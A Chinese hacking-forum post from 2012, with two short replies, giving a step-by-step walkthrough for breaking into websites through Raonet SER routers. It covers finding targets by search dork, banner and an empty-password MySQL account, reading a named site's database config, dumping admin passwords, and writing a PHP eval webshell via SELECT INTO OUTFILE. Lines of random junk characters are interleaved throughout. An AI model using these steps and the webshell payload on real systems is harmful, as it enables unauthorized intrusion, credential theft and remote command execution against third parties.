中国网络渗透测试联盟
标题:
利用某路由器漏洞入侵国外站点
[打印本页]
作者:
admin
时间:
2012-12-10 10:30
标题:
利用某路由器漏洞入侵国外站点
寻找存在漏洞的路由器方法:
3 r. Y2 B/ J0 L3 G# Q b
% r: S3 a# I6 A4 Q
1:google搜索'Raonet Subscriber Ethernet Router'
x* N- D, @% \' f, b5 }) j
2 w* d- B. @! d' J* Y, g! y
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
* z; O5 Y4 s8 S) ~. H
3 B9 @& |# [5 D) d8 |
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
, x, l. h1 S* U
5 D1 {0 x1 X' u8 y* G% M
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
' W; k+ J& }# J" y
2 i4 A: h6 Z+ e$ z/ t& ?/ M
4 d7 X" D0 ]: O' O
3 L$ _/ _; A8 `3 D
入侵步骤:
- A4 v( a6 T$ r
+ A, q. z4 U& L6 V
1.爆web路径,
http://www.yu1u.org/src/jpgraph_line.php
* q8 H6 v; ]% |/ ]
4 d U1 G3 @. K2 q: A7 L
2:查看数据库配置文件,
http://www.yu1u.org/inc/conn_db.inc
1 Z6 v' W* r+ W1 ~- P5 J h& _
3:得到密码后连接,查看GUI管理密码:
+ D4 v4 Z y8 s! o$ f. |
use ser_500
6 Y3 Y5 c: X5 \- n# C( L
select id,passwd from user;
- @, u; |5 a' w- i
4:通过数据库写入webshell,执行命令:
! N8 r+ F0 j6 G- b! V5 O# [& x
use mysql;
/ ]; y A. n# ^ |( a7 H2 Y/ g
create table ok(cmd TEXT);
1 m7 L- \, Z* w4 J% }
insert into ok values("<?php @eval($_POST[cmd])?>");
+ K! H) S0 Z+ l* K
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
& q; B8 E& |( a
drop table ok;
7 q: G- [# [. H- A5 ?% f
Z1 R; c+ L6 \6 Q& i2 |# x
5:连接后门shell.php
0 U% k9 Y+ n' T" l S
6 r* K6 @! `+ v
6. 搞定!
$ `' p6 @" w/ Y+ T; y. R9 @5 H
8 U. F+ c: K4 j- A3 H: W
作者:
Anthony~
时间:
2013-7-27 20:06
这个后果可以很严重的说
作者:
jos666
时间:
2013-7-29 12:07
不错哦,黑服务器补洞。。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2